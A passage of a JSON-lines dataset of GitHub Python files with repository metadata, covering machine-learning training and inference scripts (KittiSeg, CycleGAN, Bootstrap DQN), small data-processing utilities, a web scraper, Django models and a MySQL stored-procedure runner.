f1_score(gt, preds, average=\"macro\")\n\nacc = accuracy_score(gt, preds)\n\nprint(\"acc %s, f1 %s\"%(acc, f1))","repo_name":"soundarya98/Fascia_nucleus","sub_path":"Fascia_modelZoo/SpeechModels/modelTest.py","file_name":"modelTest.py","file_ext":"py","file_size_in_byte":2143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70246141289","text":"import os\nimport shutil\n\n\ndef copy_unique_images(source_folder, destination_folder):\n \"\"\"\n Sample one image for each of the subjects and discard other similar frames.\n Each subject is identified by the first part of the image name.\n Save the results to the destination folder.\n\n \"\"\"\n image_groups = {}\n\n # Iterate through all images in the source folder\n for filename in os.listdir(source_folder):\n filepath = os.path.join(source_folder, filename)\n\n # Check if it is a images\n if os.path.isfile(filepath):\n # Get the first part of the image name\n group_name = filename.split('_')[0]\n\n # Add the image to the corresponding group\n if group_name in image_groups:\n image_groups[group_name].append(filepath)\n else:\n image_groups[group_name] = [filepath]\n\n # Iterate through each image group and select one image to copy to the target folder\n for group_images in image_groups.values():\n if group_images:\n selected_image = group_images[0]\n shutil.copy(selected_image, destination_folder)\n\n\ndef process_folder(input_folder, output_folder):\n \"\"\"\n given one dataset folder which contains several sub_folders for different categories,\n return one dataset with its sub_folders modified by some methods (in this case,copy_unique_images())\n :param input_folder: the path of the original dataset\n :param output_folder: the output path of the modified dataset\n \"\"\"\n subfolders = [f for f in os.listdir(input_folder) if os.path.isdir(os.path.join(input_folder, f))]\n for subfolder in subfolders:\n input_path = os.path.join(input_folder, subfolder)\n output_path = os.path.join(output_folder, subfolder)\n # Create output folder, if it does not exist\n os.makedirs(output_path, exist_ok=True)\n # for each sub-folder, apply copy_unique_images()\n copy_unique_images(input_path, output_path)\n\n print(\"complete!\")\n\n\n# remove the similar frames in the CK+ dataset.\nsource_folder = '../datasets/CK+_raw'\ndestination_folder = '../datasets/CK+'\nprocess_folder(source_folder, destination_folder)\n","repo_name":"hasan-rakibul/MaskTheFER","sub_path":"src/remove_duplicate.py","file_name":"remove_duplicate.py","file_ext":"py","file_size_in_byte":2203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42234408187","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\n\r\n\r\ndef main():\r\n pagina = requests.get(\"https://pt.wikipedia.org/wiki/Wikipédia:Página_principal\")\r\n\r\n if pagina.status_code == 200:\r\n conteudo = pagina.content\r\n soup = BeautifulSoup(conteudo, \"html.parser\")\r\n links = soup.find_all(\"a\")\r\n\r\n for i in links:\r\n print(i.get(\"href\"))\r\n\r\n else:\r\n print(\"A solicitação falhou!\")\r\n\r\n\r\nmain()","repo_name":"layusso/Programa-o-para-Internet-I","sub_path":"Atividade Request/links.py","file_name":"links.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18139026399","text":"#!/usr/bin/env python\n# pylint: disable=missing-docstring\n# -*- coding: utf-8 -*-\n\n\"\"\"Trains, evaluates and saves the model network using a queue.\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport imp\nimport json\nimport logging\nimport numpy as np\nimport os.path\nimport sys\n\nimport scipy as scp\nimport scipy.misc\n\n\nsys.path.insert(1, '../../incl')\n\nimport tensorflow as tf\n\nimport tensorvision.utils as utils\nimport tensorvision.core as core\nimport tensorvision.analyze as ana\n\nfrom seg_utils import seg_utils as seg\n\n# configure logging\nif 'TV_IS_DEV' in os.environ and os.environ['TV_IS_DEV']:\n logging.basicConfig(format='%(asctime)s %(levelname)s %(message)s',\n level=logging.INFO,\n stream=sys.stdout)\nelse:\n logging.basicConfig(format='%(asctime)s %(levelname)s %(message)s',\n level=logging.INFO,\n stream=sys.stdout)\n\nflags = tf.app.flags\nFLAGS = flags.FLAGS\n\ntest_file = 'data_road/testing.txt'\n\n\ndef create_test_output(hypes, sess, image_pl, softmax):\n data_dir = hypes['dirs']['data_dir']\n data_file = os.path.join(data_dir, test_file)\n image_dir = os.path.dirname(data_file)\n\n logdir = \"test_images/\"\n logdir_rb = \"test_images_rb/\"\n logdir_green = \"test_images_green/\"\n\n logging.info(\"Images will be written to {}/test_images_{{green, rg}}\"\n .format(logdir))\n\n logdir = os.path.join(hypes['dirs']['output_dir'], logdir)\n logdir_rb = os.path.join(hypes['dirs']['output_dir'], logdir_rb)\n logdir_green = os.path.join(hypes['dirs']['output_dir'], logdir_green)\n\n if not os.path.exists(logdir):\n os.mkdir(logdir)\n\n if not os.path.exists(logdir_rb):\n os.mkdir(logdir_rb)\n\n if not os.path.exists(logdir_green):\n os.mkdir(logdir_green)\n\n image_list = []\n\n with open(data_file) as file:\n for i, image_file in enumerate(file):\n image_file = image_file.rstrip()\n image_file = os.path.join(image_dir, image_file)\n image = scp.misc.imread(image_file)\n shape = image.shape\n\n feed_dict = {image_pl: image}\n\n output = sess.run([softmax['softmax']], feed_dict=feed_dict)\n output_im = output[0][:, 1].reshape(shape[0], shape[1])\n\n ov_image = seg.make_overlay(image, output_im)\n hard = output_im > 0.5\n green_image = utils.fast_overlay(image, hard)\n\n name = os.path.basename(image_file)\n new_name = name.split('_')[0] + \"_road_\" + name.split('_')[1]\n\n save_file = os.path.join(logdir, new_name)\n logging.info(\"Writing file: %s\", save_file)\n scp.misc.imsave(save_file, output_im)\n save_file = os.path.join(logdir_rb, new_name)\n scp.misc.imsave(save_file, ov_image)\n save_file = os.path.join(logdir_green, new_name)\n scp.misc.imsave(save_file, green_image)\n\n\ndef _create_input_placeholder():\n image_pl = tf.placeholder(tf.float32)\n label_pl = tf.placeholder(tf.float32)\n return image_pl, label_pl\n\n\ndef do_inference(logdir):\n \"\"\"\n Analyze a trained model.\n\n This will load model files and weights found in logdir and run a basic\n analysis.\n\n Parameters\n ----------\n logdir : string\n Directory with logs.\n \"\"\"\n hypes = utils.load_hypes_from_logdir(logdir)\n modules = utils.load_modules_from_logdir(logdir)\n\n # Tell TensorFlow that the model will be built into the default Graph.\n with tf.Graph().as_default():\n\n # prepaire the tv session\n\n with tf.name_scope('Validation'):\n image_pl, label_pl = _create_input_placeholder()\n image = tf.expand_dims(image_pl, 0)\n softmax = core.build_inference_graph(hypes, modules,\n image=image)\n\n sess = tf.Session()\n saver = tf.train.Saver()\n\n core.load_weights(logdir, sess, saver)\n\n create_test_output(hypes, sess, image_pl, softmax)\n return\n\n\ndef main(_):\n \"\"\"Run main function.\"\"\"\n if FLAGS.logdir is None:\n logging.error(\"No logdir are given.\")\n logging.error(\"Usage: tv-analyze --logdir dir\")\n exit(1)\n\n if FLAGS.gpus is None:\n if 'TV_USE_GPUS' in os.environ:\n if os.environ['TV_USE_GPUS'] == 'force':\n logging.error('Please specify a GPU.')\n logging.error('Usage tv-train --gpus ')\n exit(1)\n else:\n gpus = os.environ['TV_USE_GPUS']\n logging.info(\"GPUs are set to: %s\", gpus)\n os.environ['CUDA_VISIBLE_DEVICES'] = gpus\n else:\n logging.info(\"GPUs are set to: %s\", FLAGS.gpus)\n os.environ['CUDA_VISIBLE_DEVICES'] = FLAGS.gpus\n\n utils.load_plugins()\n\n logdir = os.path.realpath(FLAGS.logdir)\n\n logging.info(\"Starting to analyze Model in: %s\", logdir)\n do_inference(logdir)\n\n\nif __name__ == '__main__':\n tf.app.run()\n","repo_name":"MarvinTeichmann/KittiSeg","sub_path":"submodules/evaluation/kitti_test.py","file_name":"kitti_test.py","file_ext":"py","file_size_in_byte":5147,"program_lang":"python","lang":"en","doc_type":"code","stars":904,"dataset":"github-code","pt":"53"} +{"seq_id":"4062899269","text":"import torch\r\nimport torchvision.transforms as transforms\r\n\r\nimport itertools\r\nfrom pathlib import Path\r\nimport torch.nn as nn\r\n\r\nfrom Girl2animeDataset import Girl2animeDataset\r\nfrom models import Generator,Discriminator,weights_init\r\n\r\nimport torch.backends.cudnn as cudnn\r\ncudnn.benchmark = True\r\n\r\nfrom train import fit\r\n\r\nimport os\r\nos.environ['KMP_DUPLICATE_LIB_OK']='True'\r\ndevice = torch.device('cuda') if torch.cuda.is_available() else torch.device('cpu')\r\n\r\nroot = 'girl2anime'\r\nnum_workers = 6\r\nbatch_size = 5\r\nepochs = 100\r\nlr = 2*1e-4\r\n\r\ntransform = transforms.Compose([\r\n transforms.RandomHorizontalFlip(),\r\n transforms.ToTensor(),\r\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])\r\n\r\n\r\ndataset = Girl2animeDataset(root,transform, mode=\"train\")\r\ndataloader = torch.utils.data.DataLoader(dataset, batch_size=batch_size,num_workers =num_workers , shuffle=True, pin_memory=True)\r\n\r\nmodel = {\r\n \"G_AB\": Generator().to(device),\r\n \"D_A\": Discriminator().to(device),\r\n \"F_BA\": Generator().to(device),\r\n \"D_B\": Discriminator().to(device),\r\n}\r\n\r\nmodel[\"G_AB\"].apply(weights_init)\r\nmodel[\"D_A\"].apply(weights_init)\r\nmodel[\"F_BA\"].apply(weights_init)\r\nmodel[\"D_B\"].apply(weights_init)\r\n\r\n\r\noptim_G_AB_and_F_BA = torch.optim.Adam(itertools.chain(model[\"G_AB\"].parameters(), model[\"F_BA\"].parameters()), lr=lr, betas=(0.5, 0.999))\r\noptim_D_A_and_D_B = torch.optim.Adam(itertools.chain(model[\"D_A\"].parameters(), model[\"D_B\"].parameters()), lr=lr, betas=(0.5, 0.999))\r\n\r\noptimizer = {\r\n \"G_AB_and_F_BA\": optim_G_AB_and_F_BA,\r\n \"D_A_and_D_B\": optim_D_A_and_D_B\r\n }\r\n\r\n# \"We keep the same learning rate for the first 100\r\n# epochs and linearly decay the rate to zero over the next 100\r\n# epochs.\"\r\ndef get_lr(epoch):\r\n start_decay_epoch = epochs // 2\r\n if epoch <= start_decay_epoch:\r\n return 1.0\r\n else:\r\n new_lr = (1 - (epoch - start_decay_epoch) / (start_decay_epoch))\r\n return new_lr\r\n\r\nlr_scheduler_G_AB_and_F_BA = torch.optim.lr_scheduler.LambdaLR(optimizer[\"G_AB_and_F_BA\"], lr_lambda=get_lr)\r\nlr_scheduler_D_A_and_D_B = torch.optim.lr_scheduler.LambdaLR(optimizer[\"D_A_and_D_B\"], lr_lambda=get_lr)\r\n\r\nscheduler = {\r\n \"G_AB_and_F_BA\": lr_scheduler_G_AB_and_F_BA,\r\n \"D_A_and_D_B\": lr_scheduler_D_A_and_D_B\r\n}\r\n\r\ncriterion = {\r\n \"MSE\": nn.MSELoss(),\r\n \"L1\": nn.L1Loss()\r\n}\r\n\r\nresults_path = Path(\"results\")\r\nplots_path = Path(\"plots\")\r\nweights_path = Path(\"weights\")\r\nresults_path.mkdir(parents=True, exist_ok=True)\r\nplots_path.mkdir(parents=True, exist_ok=True)\r\nweights_path.mkdir(parents=True, exist_ok=True)\r\n\r\nhistory = fit(model,optimizer,scheduler,criterion,dataloader,epochs,show_mode=False)","repo_name":"dimaavd/cyclegan-girl2anime-project","sub_path":"start_training.py","file_name":"start_training.py","file_ext":"py","file_size_in_byte":2691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41898295342","text":"from django.db import models\r\nfrom services.models import Services_servicepage\r\n\r\nclass Image_portfolio_homepage(models.Model):\r\n title = models.CharField(max_length=255)\r\n description = models.TextField()\r\n image = models.ImageField(upload_to='images_portfolio_homepage/')\r\n\r\nclass Client_comment(models.Model):\r\n name = models.CharField(max_length=40, default='Client Name')\r\n comment = models.TextField(default='Client Comment')\r\n logo = models.ImageField(upload_to='client_comment/')\r\n date = models.DateTimeField(auto_now_add=True)\r\n\r\nclass Services_myapp(models.Model):\r\n services = models.ForeignKey(Services_servicepage, on_delete=models.CASCADE) \r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n","repo_name":"destinydevelopers/site","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33352619948","text":"edad=float(input(\"Ingresa tu edad: \"))\n\nif edad>=18:\n print(\"Felicidades eres mayor de edad\")\nelse:\n print(\"Lo lamento eres menor de edad\")\n \nnombre1=input(\"Ingresa el nombre de la primer persona: \")\nedad1=float(input(\"Ingresa la edad de la primer persona: \"))\nnombre2=input(\"Ingresa el nombrede la segunda persona: \")\nedad2=float(input(\"Ingresa la edad de la sgunda persona: \"))\n\nif edad1>edad2:\n print(nombre1,\"es mayor que\",nombre2,\"con\",edad1,\"años de edad\")\nelif edad2>edad1:\n print(nombre2,\"es mayor que\",nombre1,\"con\",edad2,\"años de edad\")\nelse:\n print(nombre1,\"y\",nombre2,\"tienen la misma edad con\",edad1,\"años\")","repo_name":"LuisAguilar3456/Python-Data-Rebels-Course","sub_path":"Actividad 19.py","file_name":"Actividad 19.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42180175062","text":"#!/usr/bin/python\n\"\"\"\n@authors: Iñigo Urteaga and Moulay-Zaidane Draidia\n\"\"\"\n\n# Imports: python modules\nimport sys, os, re, time\nimport argparse\n\n# Load Fairseq config from file to string\ndef load_fairseq_config_string(config_filepath):\n config_data=None\n # Try opening the config file\n with open('{}'.format(config_filepath), 'r') as config:\n config_data=config.read()\n # Remove double newlines\n config_data=re.sub('\\n\\n','\\n', config_data)\n # Ignore commented lines\n config_data=re.sub('#.*\\n','', config_data)\n # Put all together with spaces\n config_data=re.sub('\\n',' ', config_data)\n \n # Return content\n return config_data\n\n# Update Fairseq config string with new parameter values\ndef update_fairseq_config_string(config_string, params_to_update):\n # Update parameter values\n for param_to_update,param_value in params_to_update.items():\n config_string=re.sub('--{} (.*?) '.format(param_to_update), '--{} {} '.format(param_to_update,param_value), config_string)\n \n # Return modified config string\n return config_string\n\ndef update_fairseq_config_file(config_filepath, params_to_update):\n # Try opening the config file\n with open('{}'.format(config_filepath), 'r+') as config:\n # Read old config\n new_config_data=config.read()\n # Update parameter values\n for param_to_update,param_value in params_to_update.items():\n new_config_data=re.sub('--{} (.*?)\\\\n'.format(param_to_update), '--{} {}\\\\n'.format(param_to_update,param_value), new_config_data)\n \n # Write to file and close\n config.seek(0)\n config.write(new_config_data)\n config.truncate()\n config.close()\n\ndef main(config_filepath, save_dir, restore_file):\n # Call function\n config_data=load_fairseq_config_string(config_filepath)\n\n # Replace save_dir, if given\n if save_dir is not None:\n # Replace save dir\n config_data=re.sub('--save-dir (.*?) ', '--save-dir {} '.format(save_dir), config_data)\n\n # Replace restore_file, if given\n if restore_file is not None:\n # Replace save dir\n config_data=re.sub('--restore-file (.*?) ', '--restore-file {} '.format(restore_file), config_data)\n\n # Print content, to use within shell script\n print(config_data)\n\n######################################### \n# Main program is not executed when the module is imported\nif __name__ == '__main__': \n parser = argparse.ArgumentParser(\n description='Script to load Fairseq config from file to string'\n )\n parser.add_argument(\n '-fairseq_config_filepath',\n type=str,\n default='./fairseq_config/pretrain_params_string',\n help='Filepath to Fairseq config file'\n )\n parser.add_argument(\n '-save_dir',\n type=str,\n default='./nlp_bandit_experiments',\n help='Directory for output content'\n )\n \n parser.add_argument(\n '-restore_file',\n type=str,\n default='None',\n help='Path to model checkpoint to restore training from'\n )\n \n # Get arguments from script\n args = parser.parse_args()\n \n # Call main\n main(\n args.fairseq_config_filepath,\n args.save_dir,\n args.restore_file\n )\n","repo_name":"iurteaga/gp_ts_nlp","sub_path":"nlp_bandit_scripts/fairseq_config_utils.py","file_name":"fairseq_config_utils.py","file_ext":"py","file_size_in_byte":3319,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"25764221407","text":"\"\"\"\nThis file contains all the important functions needed for loading model and dataset\n\"\"\"\nfrom typing import Union, Tuple, Any\n\nimport numpy as np\nimport torch\nimport torchmetrics\nimport torchvision\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom skimage.filters import gaussian\nfrom tqdm import tqdm\nimport wandb\n\nfrom .dataloader import BlurLoader\nimport trainer\n\n@trainer.Metric.register(\"ce_prior\")\nclass Test_Metric(trainer.Metric):\n def get_metrics(self):\n metricfun = torchmetrics.MetricCollection(\n [torchmetrics.Accuracy(), torchmetrics.ConfusionMatrix(num_classes=2)]\n )\n return metricfun\n\n\n@trainer.Dataset.register(\"ce_prior\")\nclass Blur_Dataset(trainer.Dataset):\n def get_transforms(self) -> Tuple[Any, Any]:\n transform = torchvision.transforms.Compose(\n [\n torchvision.transforms.ToTensor(),\n torchvision.transforms.Grayscale()\n ]\n )\n return transform, transform\n\n def get_loaders(self):\n trainset = BlurLoader(blur_kernel=self.fspecial_gaussian_2d((self.kwargs[\"blur_size\"], self.kwargs[\"blur_size\"]), self.kwargs[\"blur_sigma\"]),\n sigma=self.kwargs[\"sigma\"],\n image_pth=self.path,\n tile_h=self.kwargs[\"tile_h\"],\n tile_w=self.kwargs[\"tile_w\"],\n tile_stride_factor_h=self.kwargs[\"tile_stride_factor_h\"],\n tile_stride_factor_w=self.kwargs[\"tile_stride_factor_w\"],\n mode=\"train\",\n mask_pth=self.kwargs[\"mask_pth\"],\n lwst_level_idx=self.kwargs[\"lwst_level_idx\"],\n threshold=self.kwargs[\"threshold\"],\n transform=self.train_transform)\n \n testset = BlurLoader(blur_kernel=self.fspecial_gaussian_2d((self.kwargs[\"blur_size\"], self.kwargs[\"blur_size\"]), self.kwargs[\"blur_sigma\"]),\n sigma=self.kwargs[\"sigma\"],\n image_pth=self.path,\n tile_h=self.kwargs[\"tile_h\"],\n tile_w=self.kwargs[\"tile_w\"],\n tile_stride_factor_h=self.kwargs[\"tile_stride_factor_h\"],\n tile_stride_factor_w=self.kwargs[\"tile_stride_factor_w\"],\n mode=\"test\",\n mask_pth=self.kwargs[\"mask_pth\"],\n lwst_level_idx=self.kwargs[\"lwst_level_idx\"],\n threshold=self.kwargs[\"threshold\"],\n transform=self.test_transform)\n \n trainloader = torch.utils.data.DataLoader(\n trainset, batch_size=self.train_batch_size, shuffle=True\n )\n testloader = torch.utils.data.DataLoader(\n testset, batch_size=self.test_batch_size, shuffle=True\n )\n return trainset, trainloader, testset, testloader\n\n @staticmethod\n def fspecial_gaussian_2d(size, sigma):\n kernel = np.zeros(tuple(size))\n kernel[size[0]//2, size[1]//2] = 1\n kernel = gaussian(kernel, sigma)\n return kernel/np.sum(kernel)\n\n\n@trainer.Logger.register(\"ce_prior\")\nclass CE_logger(trainer.Logger):\n def log_table(self, input, output, label, epoch):\n columns = [\"id\", \"image\", \"real class\", \"calculated class\"]\n table = wandb.Table(columns=columns)\n _, preds = torch.max(output.data, 1)\n for i in range(2):\n idx = f\"{epoch}_{i}\"\n image = wandb.Image(input[i].permute(1, 2, 0).cpu().numpy())\n table.add_data(idx, image, preds[i], label[i])\n self.log({\"table_key\": table})\n\n\n@trainer.Model.register(\"ce_prior\")\nclass CE_model(trainer.Model):\n def __init__(self,**kwargs):\n super().__init__()\n self.model = torchvision.models.__dict__[\"resnet18\"](pretrained=True)\n self.model.fc = torch.nn.Linear(self.model.fc.in_features, 2)\n\n def forward(self, x):\n output = self.model(x)\n return output\n\n\nclass TrainEngine(trainer.Trainer):\n def train(self):\n self.model.train()\n for data in tqdm(self.dataset.trainloader):\n image, label = data\n image, label = image.to(self.device), label.to(self.device)\n self.optimizer.zero_grad()\n outputs = self.model(image)\n loss = self.loss_fun(outputs, label)\n loss.backward()\n self.optimizer.step()\n # Track loss\n self.logger.track(loss_value=loss.item())\n # metric calculation\n self.metrics(outputs, label)\n # Logging loss\n self.logger.log({\"Epoch Train loss\": loss.item()})\n self.metrics.compute()\n self.metrics.log()\n print(\n \"Total Train loss: {}\".format(\n np.mean(self.logger.get_tracked(\"loss_value\"))\n )\n )\n\n def val(self):\n self.model.eval()\n for data in tqdm(self.dataset.testloader):\n image, label = data\n image, label = image.to(self.device), label.to(self.device)\n outputs = self.model(image)\n loss = self.loss_fun(outputs, label)\n # Track loss\n self.logger.track(loss_value=loss.item())\n # metric calculation\n self.metrics(outputs, label)\n # Logging loss\n self.logger.log({\"Epoch Train loss\": loss.item()})\n self.metrics.compute()\n self.metrics.log()\n if self.current_epoch % 5 == 0:\n self.logger.log_table(image, outputs, label, self.current_epoch)\n\n mean_loss = np.mean(self.logger.get_tracked(\"loss_value\")) / len(\n self.dataset.testloader\n )\n print(\"Total Val loss: {}\".format(mean_loss))\n\n return self.metrics.results[\"val_Accuracy\"], mean_loss","repo_name":"Vishwesh4/PriorsDeconvolution","sub_path":"training/utils/trainutils.py","file_name":"trainutils.py","file_ext":"py","file_size_in_byte":5703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3005150915","text":"import torch\nimport torch.nn as nn\nimport numpy as np\nfrom collections import namedtuple\nfrom drl_api.models import DQN_Model\nfrom drl_api.models import _DQN\nfrom drl_api.memory import ReplayMemory\n\nclass BootstrapDQN_Model(DQN_Model):\n ''' Base Bootstrap DQN Model, only supports convolutional features at the moment '''\n def __init__(self, huber_loss, n_heads, p=0.5, **kwargs):\n super().__init__(**kwargs)\n\n self.huber_loss = huber_loss\n self.n_heads = n_heads\n self.p = p\n self.replay_memory = ReplayMemory(self.memory_size,\n namedtuple('Transition',\n ('state',\n 'action',\n 'reward',\n 'next_state',\n 'terminal',\n 'mask'))\n )\n\n\n\n\n def init_networks(self):\n self.Q_eval = _BootDQN(n_heads=self.n_heads,\n n_dim=self.obs_shape[2],\n out_dim=self.n_actions,\n lr=self.lr,\n name='eval',\n gpu=self.gpu)\n\n self.Q_target = _BootDQN(n_heads=self.n_heads,\n n_dim=self.obs_shape[2],\n out_dim=self.n_actions,\n lr=self.lr,\n name='target',\n gpu=self.gpu)\n\n # weights initialization\n self.Q_eval.apply(self.Q_eval.init_weights)\n\n # eval-target setup\n self.replace_target_network()\n self.Q_eval.to(self.Q_eval.device)\n self.Q_target.to(self.Q_target.device)\n\n\n def learn(self, batch):\n self.Q_eval.optimizer.zero_grad()\n batch_dict = self.process_batch(batch)\n for key in batch_dict:\n batch_dict[key] = torch.tensor(batch_dict[key]).to(self.Q_eval.device)\n\n batch_size = batch_dict['state'].shape[0]\n batch_index = np.arange(batch_size, dtype=np.int32)\n\n # ddqn step\n q_eval = self.Q_eval.forward(batch_dict['state'], all=True)[batch_index, batch_dict['action']] # get q_evals for all n_heads\n q_next = self.Q_target.forward(batch_dict['next_state'], all=True)\n q_next_eval = self.Q_eval.forward(batch_dict['next_state'], all=True)\n q_next[batch_dict['terminal']] = 0.0\n q_next_eval[batch_dict['terminal']] = 0.0\n\n for i in range(self.n_heads):\n # sequentially backpropagate gradient info\n ddqn_idx = torch.argmax(q_next_eval[i], dim=1)\n q_target = batch_dict['reward'] + self.gamma * q_next[i][batch_index, ddqn_idx]\n loss = self.Q_eval.loss(q_target, q_eval[i]).to(self.Q_eval.device)\n loss.backward()\n\n self.Q_eval.optimizer.step()\n\n\n\n def store_transition(self, *args):\n ''' Implements Bernoulli mask '''\n args = args + (np.random.binomial(1, self.p, self.n_heads),)\n self.replay_memory.push(args)\n\n\nclass _BootDQN(_DQN):\n ''' Bootstrapped Deeeeep Q Network '''\n def __init__(self, n_heads, huber=False, *args, **kwargs):\n self.n_heads = n_heads\n super(_BootDQN, self).__init__(*args, **kwargs)\n\n # Make bootstrapped heads\n self.heads = [self.make_head(self.in_dim, self.out_dim) for _ in range(self.n_heads)]\n self.cur_head = None # index of current head, type: int\n self.huber_loss = huber\n # redefine loss function\n self.loss = nn.SmoothL1Loss() if self.huber_loss else nn.MSELoss()\n\n\n def make_head(self, in_dim, out_dim):\n ''' Creates a bootstrap head, universal approximators go brrrr '''\n return nn.Sequential(\n nn.Linear(in_dim, 512),\n nn.ReLU(),\n nn.Linear(512, out_dim)\n )\n\n\n def forward(self, x, all=False):\n x = torch.tensor(x, dtype=torch.float).to(self.device)\n x = self.conv(x)\n x = x.view(x.size(0), -1)\n if not all:\n q_vals = self.heads[self.cur_head](x)\n else:\n q_vals = [self.heads[i](x) for i in range(self.n_heads)]\n\n return q_vals\n\n\n def set_head(self, n):\n self.cur_head = n","repo_name":"opent03/drl_api","sub_path":"drl_api/models/bootstrap_dqn.py","file_name":"bootstrap_dqn.py","file_ext":"py","file_size_in_byte":4478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"75351621928","text":"\n#def divide_elementos_de_lista(lista, divisor):\n #return [i / divisor for i in lista]\n\n\n#lista = list(range(10))\n#divisor = 0\n\n#print(divide_elementos_de_lista(lista, divisor))\n\n#Si tratamos de dividir por cero, tenemos una excepcion:\n#ZeroDivisionError: division by zero\n#ESto implica que el programa crasheo. Para evitar que esto suceda a nivel de usuario,\n#y para tener control sobre el uso de la funcion, podemos utilizar programacion defensiva\n#con las keyword 'try' y 'except':\n\ndef divide_elementos_de_lista(lista, dividor):\n try:\n return [i / divisor for i in lista]\n except ZeroDivisionError as e:\n print(e)\n return lista\n\nlista = list(range(10))\ndivisor = 0\n\nprint(divide_elementos_de_lista(lista, divisor))\n\n#En este caso en primer lugar, con try intentara ejecutar la division\n#sin embargo, si por alguna razon surge la excepcion de ZeroDivisionError,\n#se le pide que retorne simplmente la lista para evitar el codigo de error y el crasheo.\n#Esto evidenciaria al usuario un error pero sin tirar abajo el programa.\n#De esta manera se hace el manejo de las excepciones.\n\n","repo_name":"alexisalt/curso_pensamiento_computacional","sub_path":"excepciones.py","file_name":"excepciones.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5497912045","text":"import os\nimport sys\nimport numpy as np\n\nnp.random.seed(123456)\n\n# ori_data contains original data\n# data will store new custom split data\ndata_path = 'experiments/tasks/ori_data'\ncustom_data_path = 'experiments/tasks/data'\n\nif not os.path.exists(custom_data_path):\n\tos.makedirs(custom_data_path)\n\ntask = sys.argv[1]\n\nif task == 'winogrande':\n\ttask = task + '/winogrande_1.1'\n\t\nfnames = os.listdir(os.path.join(data_path, task))\n\ndev_name = 'dev'\ntest_name = 'test'\ndev_files = []\nnum_examples = 0\nfor fname in fnames:\n\tif fname.endswith('gz'):\n\t\tcontinue\n\telif fname.startswith('valid'):\n\t\tdev_name = 'valid'\n\t\tdev_files.append(fname)\n\telif fname.startswith('val'):\n\t\tdev_name = 'val'\n\t\tdev_files.append(fname)\n\telif fname.startswith('dev'):\n\t\tdev_name = 'dev'\n\t\tdev_files.append(fname)\n\telif fname.startswith('tests'): # for piqa\n\t\ttest_name = 'tests'\n\telif fname.startswith('test'):\n\t\ttest_name = 'test'\n\nf = open(os.path.join(data_path, task, dev_files[0])).readlines()\nnum_examples = len(f)\ndev_idx = np.random.choice(num_examples, num_examples // 2, replace=False)\n\nprint(dev_files)\nprint(dev_name, test_name)\nfor fname in dev_files:\n\tf = open(os.path.join(data_path, task, fname)).readlines()\n\tfdev = open(os.path.join(custom_data_path, task, fname), 'w')\n\tftest = open(os.path.join(custom_data_path, task, fname.replace(dev_name, test_name)), 'w')\n\n\tprint(len(f), num_examples)\n\tassert len(f) == num_examples\n\tfor i in range(num_examples):\n\t if i in dev_idx:\n\t fdev.write(f[i])\n\t else:\n\t ftest.write(f[i])\n\tfdev.close()\n\tftest.close()\n\nprint(task)\nprint('Dev examples', len(dev_idx))\nprint('Test examples', num_examples - len(dev_idx))\n","repo_name":"nyu-mll/nlu-test-sets","sub_path":"irt_scripts/preproc_scripts/make_custom_split.py","file_name":"make_custom_split.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"12971687040","text":"import pymysql\nimport pymysql.cursors\ndatabaseCharset = \"utf8mb4\"\n# objetivando iniciar procedures que atualizarao o banco de dados\n\ncusrorType = pymysql.cursors.DictCursor\n\ndatabaseConnection = pymysql.connect(host='url host',\n user=\"login\",\n\n password=\"senha\",\n\n db=\"banco de dados\",\n\n charset=databaseCharset,\n\n cursorclass=cusrorType)\ntry:\n\n # Cursor object creation\n\n cursorObject = databaseConnection.cursor()\n\n # Execute the sqlQuery\n\n cursorObject.execute(\"call 1extrigger()\")\n databaseConnection.commit()\n print(\"executou a primeira do dia\")\n\n cursorObject.execute(\"DELETE FROM resultado WHERE 1\")\n cursorObject.execute(\"call 2gamefica_calcula()\")\n cursorObject.execute(\"call \t3gamefica_pontua()\")\n databaseConnection.commit()\n print(\"eita, rodou metade\")\n\n cursorObject.execute(\"call \tresultado_identifica_por_cpf()\")\n cursorObject.execute(\"DELETE FROM rankings WHERE 1\")\n cursorObject.execute(\"call joga_dados_ranking()\")\n # so far taking 9 to 10 min\n databaseConnection.commit()\n\n print(\"sera q rodou mesmo?\")\n\n # Print the result of the executed stored procedure\n\n for result in cursorObject.fetchall():\n\n print(result)\n\n\nexcept Exception as e:\n\n print(\"Exeception occured:{}\".format(e))\n\n\nfinally:\n\n databaseConnection.close()\n\nprint(\"did dis shid worked at all?\")\n","repo_name":"AugustoBaden/tcc-scripts","sub_path":"gamefication-tcc/callProc.py","file_name":"callProc.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"36598104991","text":"import logging,json,os\nimport socket, sys ,threading ,signal,time,select\nimport urllib,urllib2\nimport subprocess\n\n# CRITICAL\t50\t严重错误,表明程序已不能继续运行了\n# ERROR\t 40\t严重的问题,程序已不能执行一些功能了\n# 